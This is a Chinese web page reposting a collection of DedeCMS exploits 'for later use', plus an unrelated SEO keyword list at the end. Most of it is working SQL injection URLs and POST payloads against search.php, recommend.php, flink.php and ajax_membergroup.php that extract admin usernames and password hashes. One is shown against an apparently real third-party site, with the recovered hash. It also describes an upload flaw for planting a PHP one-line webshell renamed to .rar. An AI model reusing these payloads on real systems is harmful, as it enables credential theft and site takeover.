千家信息网

DedeCMS多个漏洞exp汇总,以备后用

发表于:2024-11-15 作者:千家信息网编辑
千家信息网最后更新 2024年11月15日,爆路径:data/mysql_error_trace.inc一、dedecms plus/search.php注入漏洞修复及利用0×1:http://www.nxadmin.com/plus/sear
千家信息网最后更新 2024年11月15日DedeCMS多个漏洞exp汇总,以备后用

爆路径:data/mysql_error_trace.inc


一、dedecms plus/search.php注入漏洞修复及利用

0×1:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

报错如果为:Safe Alert: Request Error step 2 !
则利用以下exp:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

0×2:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

报错如果为:Safe Alert: Request Error step 1 !
则利用以下exp:

http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a


二、DedeCms recommend.php注入

exp:

http://0day5.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294


三、flink.php注入

0x1:首先通过flink_add.php查看验证码

0x2:利用火狐的hackbar发送post数据包

exp:

查版本:

Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select version())),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=验证码&_FILES[webname][name]=1.gif&_FILES[webname][type]=p_w_picpath/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\

查密码:

Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=验证码&_FILES[webname][name]=1.gif&_FILES[webname][type]=p_w_picpath/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\


详情请见

http://www.wooyun.org/bugs/wooyun-2014-051950


四、ajax_membergroup.php注入漏洞


①注入漏洞。
这站 http://www.30tianlong.com/
首先访问"/data/admin/ver.txt"页面获取系统最后升级时间,
然后访问"/member/ajax_membergroup.php?action=post&membergroup=1"页面,如图说明存在该漏洞。
然后写上语句
查看管理员帐号

http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`


admin

查看管理员密码

http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@


8d29b1ef9f8c5a5af429

查看管理员密码

得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5

8d2
9b1ef9f8c5a5af42
9

cmd5没解出来 只好测试第二个方法

②上传漏洞:

只要登陆会员中心,然后访问页面链接

http://www.xxxx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[/code]=../dialog/select_soft_post


如图,说明通过"/plus/carbuyaction.php"已经成功调用了上传页面"/dialog/select_soft_post"

于是将Php一句话***扩展名改为"rar"等,利用提交页面upload1.htm

file:
newname:

即可上传成功

转载文章请注明,转载自:小马's Blog http://www.i0day.com


漏洞 页面 管理员 管理 密码 验证 成功 如图 一句话 会员 会员中心 小马 扩展名 数据 文章 方法 时间 火狐 版本 系统 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 如何使用服务器访问指定网址 关于省份和地区的数据库 软件开发实训室图片 磁带机怎么备份数据库 服务器上丝毫不起眼的东西 南通智能化软件开发注意事项 护苗青少年网络安全课第三期 微商群发软件开发 杭州舒跑互联网科技有限公司 个人如何应对网络安全 软件开发中心外包 osx服务器 深圳这边网络安全公司 网络安全法42条规定司法解释 数据库应用怎么控制安全性 株洲加固式服务器的厂家 手机用什么软件保证网络安全 2016服务器上的邮件如何清理 oledb数据库操作 Nhanes数据库的死亡率 湖南天搜网络技术招聘 云服务器存储的文件别人 pve 控制台无法连接到服务器 服务器安全性能对比 联想服务器维修调试多少钱 服务器可以安装两个阵列卡吗 姜堰区环保网络技术价格表格 truenas搭建web服务器 c 中数据库信息修改代码 软件开发培训班学费
0